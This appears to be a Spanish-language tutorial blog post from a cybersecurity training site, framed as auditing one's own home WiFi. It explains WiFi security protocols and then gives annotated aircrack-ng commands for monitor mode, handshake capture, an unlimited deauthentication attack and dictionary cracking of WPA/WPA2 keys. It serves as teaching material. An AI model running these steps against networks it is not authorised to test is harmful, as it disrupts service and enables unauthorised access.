Unirme a CiberInsider

Cómo hackear una red WIFI de forma ética y legal

Hoy vas a aprender a hackear tu primera red wifi desde el absoluto 0, y no necesitas experiencia previa para hacerlo.

En este vídeo vamos a auditar una red wifi sin necesidad de saber la contraseña, realizar ataques de desautenticación, crackear la contraseña de una red WiFi desconocida y entender de principio a fin cómo funciona el proceso de hacking WiFi cuando comienzas a estudiar.

Este vídeo está diseñado para que cualquiera, sí, cualquiera, pueda seguirlo y hackear su primera red WiFi.

Además, voy a darte un regalo que te ayudará a conseguir tu primer trabajo en ciberseguridad.

¿Siguiente paso para aprender hacking ético y ciberseguridad?

Rellena el siguiente formulario y consigue acceso a los recursos mencionados en el vídeo de forma gratuita:

Escribe aquí tu nombre y tu email

Descarga los recursos para hackear tu primera red WiFi

Qué necesitas saber antes de auditar una red WiFi

Primero debes entender cómo funcionan las conexiones inalámbricas. Las redes WiFi funcionan con ondas de radio y utilizan protocolos de seguridad para cifrar la comunicación. Sin embargo, muchas redes utilizan medidas de seguridad obsoletas y vulnerables que pueden ser explotadas por actores maliciosos.

¿Cómo funcionan las redes WiFi?

De forma muy sencilla y resumida, las redes WiFi permiten la conexión de dispositivos a internet sin necesidad de cables, utilizando ondas de radio. Estas señales las gestiona el router, que asigna direcciones IP; que básicamente es un identificador único asignado a un dispositivo conectado a una red.

Protocolos de seguridad WiFi

Los protocolos de seguridad en redes WiFi determinan cómo se cifran y protegen los datos que navegan por la red. Los más comunes son WEP, WPA, WPA2 y WPA3.

  • WEP: es el protocolo más obsoleto. Su uso ya no se recomienda debido a sus debilidades.
  • WPA: mejoró la seguridad de WEP, pero aún presenta vulnerabilidades, especialmente en el uso de claves más débiles.
  • WPA2: es más seguro que WPA y utiliza AES para cifrar los datos. Sin embargo, también tiene vulnerabilidades, sobre todo si se utilizan contraseñas conocidas o débiles.
  • WPA3: es el protocolo más reciente, lo que significa que tiene un cifrado más seguro y una mejor protección contra los ataques de fuerza bruta. Sin embargo, todavía hay redes que no lo implementan.

La mayoría de redes WiFi, sobre todo las de nuestras casas, utilizan WPA/WPA2.

Métodos de cifrado y autenticación

El cifrado y la autenticación son dos conceptos para garantizar la seguridad de una red WiFi. Los métodos de cifrado más comunes son TKIP, AES y PSK.

  • TKIP (Temporal Key Integrity Protocol) es un protocolo de cifrado más antiguo, utilizado principalmente en redes WPA y WPA2. Aunque es más seguro que WEP, es vulnerable a varios tipos de ataques, como los de fuerza bruta.
  • PSK (Pre-Shared Key) es un método de autenticación que requiere una clave compartida entre el cliente (nuestro móvil, PC o móvil) y el router para acceder a la red. Este método, aunque es muy utilizado, puede ser hackeado si la contraseña es débil o se obtiene mediante ataques de diccionario o fuerza bruta.
  • AES (Advanced Encryption Standard) es un protocolo de cifrado más seguro, utilizado en WPA2 y WPA3. AES es casi impenetrable cuando se implementa correctamente y es el estándar en redes modernas.

Ahora que ya conoces lo básico sobre redes WiFi, vamos a ver qué necesitas para comenzar a auditar una red.

¿Qué necesitas para auditar una red WiFi?

Adaptador WiFi compatible con modo monitor

Un adaptador WiFi compatible con modo monitor es un dispositivo de red que permite capturar tráfico inalámbrico sin necesidad de estar conectado a la red. A diferencia de los adaptadores WiFi normales, que solo pueden enviar y recibir datos de una red a la que están asociados, los que soportan modo monitor pueden escuchar todo el tráfico que circula en el aire, incluso si no están conectados a ningún punto de acceso.

En nuestro caso, vamos a necesitar este tipo de adaptador porque vamos a simular un ataque real en la red de nuestra casa.

Yo en mi caso, tengo este adaptador WiFi que permite modo monitor. Abajo en el primer comentario, te dejo el enlace para que puedas adquirirlo.

Sistema operativo Kali Linux

También necesitamos un sistema operativo para realizar estas pruebas. Yo voy a utilizar Kali Linux. Hay herramientas y otras formas de auditar una red WiFi sin necesidad de utilizar Kali Linux, aún así, este sistema operativo tiene todo lo necesario para realizar auditorías, por lo tanto, es el que yo voy a utilizar para este vídeo.

Si quieres saber cómo instalar Kali Linux de forma rápida, también te dejo por aquí un artículo donde te lo explico.

Metodología de Pentesting en redes WiFi con captura de handshake

La metodología que vamos a seguir es la siguiente:

  1. Fase inicial: Conectamos el adaptador en modo monitor para escanear redes WiFi.
  2. Ataque de desautenticación: Se envían paquetes de autenticación para forzar la reconexión de un cliente a la red.
  3. Captura del handshake: Cuando el cliente intenta reconectarse, se captura el handshake de 4 vías, que contiene información cifrada de la clave de la red. Básicamente, cuando un dispositivo intenta conectarse a una red WiFi se intercambian cuatro mensajes entre el router y el cliente (móvil, laptop, etc.) para verificar que ambos tienen la contraseña correcta sin revelarla directamente. Este proceso se llama handshake de 4 vías y garantiza que solo los dispositivos autorizados accedan a la red.
  4. Cracking de contraseña: Se usa un ataque de diccionario para intentar descifrar la clave WPA/WPA2.

Cómo saber si mi WiFi es seguro

1.Una vez en el PC y con nuestro Kali Linux abierto, vamos a conectar nuestro adaptador WiFi con m modo monitor. En mi caso, lo reconoce al instante sin necesidad de instalar ningún driver.

iwconfig
sudo ifconfig wlan0 down
sudo ifconfig wlan0 up
iwconfig
sudo airmon-ng start wlan0

2. Ahora, con nuestro adaptador en modo monitor, vamos a escanear las redes WiFi para localizar nuestra red WiFi, en este caso, la de mi casa.

sudo airodump-ng wlan0mon
# Recuerda que el nombre de la interfaz debe estar al final

3.Para capturar el handshake, ejecutamos:

sudo airodump-ng -c 1 --bssid 00:00:00:00:00:00 -w capture-file wlan0mon
# sudo para ejecutarlo con privilegios de root
# airodump-ng es la herramienta para captar tráfico en la red
# -c hace referencia al canal en el que está el router en comunicación
# --bssid La dirección MAC del router
# -w El archivo donde se guardará el handshake
# wlan0mon Interfaz de red a utilizar

Ahora, con nuestro teléfono por ejemplo, navegamos por internet y en pantalla veremos el dispositivo y la estación.

Esta ejecución la dejamos activa para que capture paquetes y se guarden en el archivo que hemos indicado con -w

Mientras tanto, vamos a realizar un ataque de desautenticación en el teléfono que esta conectado a la red WiFi. Básicamente, vamos a enviar paquetes al teléfono y este va a conectarse y desconectarse continuamente.

sudo aireplay-ng -0 0 -a 00:00:00:00:00:00 -c 00:00:00:00:00:00 wlan0mon
# sudo para ejecutarlo con privilegios de root
# aireplay-ng Herramienta para enviar los paquetes al objetivo
# -0 Selección de paquetes que queremos enviar (0=infinito)
# -a Dirección MAC del router
# -c Dirección STATION del cliente conectado
# wlan0mon Interfaz de red a utilizar

4.Para crackear la contraseña necesitamos un diccionario con contraseñas y el archivo que contiene la contraseña encriptada.

sudo aircrack-ng -w rockyou.txt capture-file-01.cap
# sudo para ejecutarlo con privilegios de root
# aircrack-ng Herramienta para crackear la contraseña
# -w Archivo donde se encuentran las contraseñas que queremos probar
# Nombre del archivo .cap donde se encuentra el handshake capturado

Si has conseguido la contraseña del router, demuestra que tu red no es del todo segura.

La intención de este vídeo es ver que si comprendemos las tácticas que emplean los ciberdelicuentes, podremos proteger mejor nuestras propias redes y contribuir a un entorno mucho más seguro. Recuerda que estos conocimientos deben utilizarse de forma responsable y ética.

Únete a CiberInsider y  prepárate para dar el primer paso a conseguir tu empleo en ciberseguridad

Al suscribirte, aceptas la política de privacidad de rinku.tech y recibir noticias, contenidos, comunicaciones relacionados con la web, gratuitos y premium.

Clase gratuita ciberseguridad
CLASE GRATUITA
Descubre cómo conseguir tu primer trabajo en ciberseguridad para asegurar tu futuro profesional en un sector en pleno crecimiento y con muy buen salario